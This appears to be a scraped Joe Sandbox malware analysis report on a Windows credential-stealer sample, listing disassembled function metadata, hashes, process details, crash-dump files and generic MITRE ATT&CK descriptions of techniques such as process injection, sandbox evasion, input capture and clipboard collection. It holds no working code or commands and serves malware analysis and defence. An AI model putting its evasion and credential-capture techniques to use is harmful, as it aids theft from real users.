Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: write failed: %lu
API String ID: 442123175-171016427
Opcode ID: 2b56cc4d8b015f59f60832091a1ab7e69cd44d19eeb6f212f7ad36cf27e8ddb9
Instruction ID: 72c4583087e370cfb116c5dc9e1670fe997d821653d9582940dc72fd252c6b67
Opcode Fuzzy Hash: 2b56cc4d8b015f59f60832091a1ab7e69cd44d19eeb6f212f7ad36cf27e8ddb9
Instruction Fuzzy Hash: 19310BB45083459FCB00EF18C888B9E7BE5FF44354F018A69F8998B391D370DA94CB82

Uniqueness

Uniqueness Score: -1.00%

Function 001A75B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 001A7617
GetLastError.KERNEL32 ref: 001A7629

Strings

write failed: %lu, xrefs: 001A762F

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: write failed: %lu
API String ID: 442123175-171016427
Opcode ID: 66ae816b0724a25effe3980b4301589d6df8046c65e04039190f927aa89e13ea
Instruction ID: 0117ce3f43025b7e5e800556d6137d3f823fc160c4d854c283a5035118694db6
Opcode Fuzzy Hash: 66ae816b0724a25effe3980b4301589d6df8046c65e04039190f927aa89e13ea
Instruction Fuzzy Hash: 5D115B744083049FC700EF5CC488B9A7BE5EF04360F018669E89D8B392D770DAC8CB82

Uniqueness

Uniqueness Score: -1.00%

Target ID:	0
Start time:	16:56:09
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
Imagebase:	0x1a0000
File size:	147968 bytes
MD5 hash:	C852376DDA1DE89231D5F558255775E0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Target ID:	2
Start time:	16:56:10
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 464
Imagebase:	0x2b0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_c136f9839aaccad85a66b9f733bbb3cf4c588e0_e9cd6a7e_166ff3ee\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE76B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA98.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB55.tmp.xml

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exePID: 5640, Parent PID: 3452

General

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Function 001A18D0 Relevance: 33.7, APIs: 10, Strings: 9, Instructions: 441
filememoryCOMMONCrypto

Function 001AD720 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 001B5AE0 Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 001B4871 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 001B48CE Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Function 001AC4C0 Relevance: 74.0, APIs: 24, Strings: 18, Instructions: 467
registrystringCOMMON

Function 001A8E70 Relevance: 50.2, APIs: 33, Instructions: 689
windowCOMMON

Function 001A34E0 Relevance: 36.1, APIs: 19, Strings: 1, Instructions: 1077
windowCOMMONCrypto

Function 001B5347 Relevance: 6.1, APIs: 4, Instructions: 129
fileCOMMON

Function 001AD72C Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Function 001B37DA Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Function 001BA9AA Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Function 001B5293 Relevance: 1.7, APIs: 1, Instructions: 158
fileCOMMON

Function 001AD945 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Function 001B258B Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 001B418D Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Function 001B009E Relevance: .0, Instructions: 12
COMMONLIBRARYCODE

Function 001ABF30 Relevance: 42.3, APIs: 28, Instructions: 296
COMMON

Function 001AAE30 Relevance: 31.7, APIs: 21, Instructions: 226
windowCOMMON

Function 001AA680 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181
registryCOMMON

Function 001B7A82 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Function 001ADED0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Function 001B2369 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 001B1C7C Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Function 001B001C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMONLIBRARYCODE

Function 001B7EA7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115
COMMONLIBRARYCODE

Function 001B6086 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Function 001B69C1 Relevance: 6.3, APIs: 4, Instructions: 338
fileCOMMONLIBRARYCODE

Function 001B78AB Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Function 001B8F6D Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Function 001B771B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93
COMMONLIBRARYCODE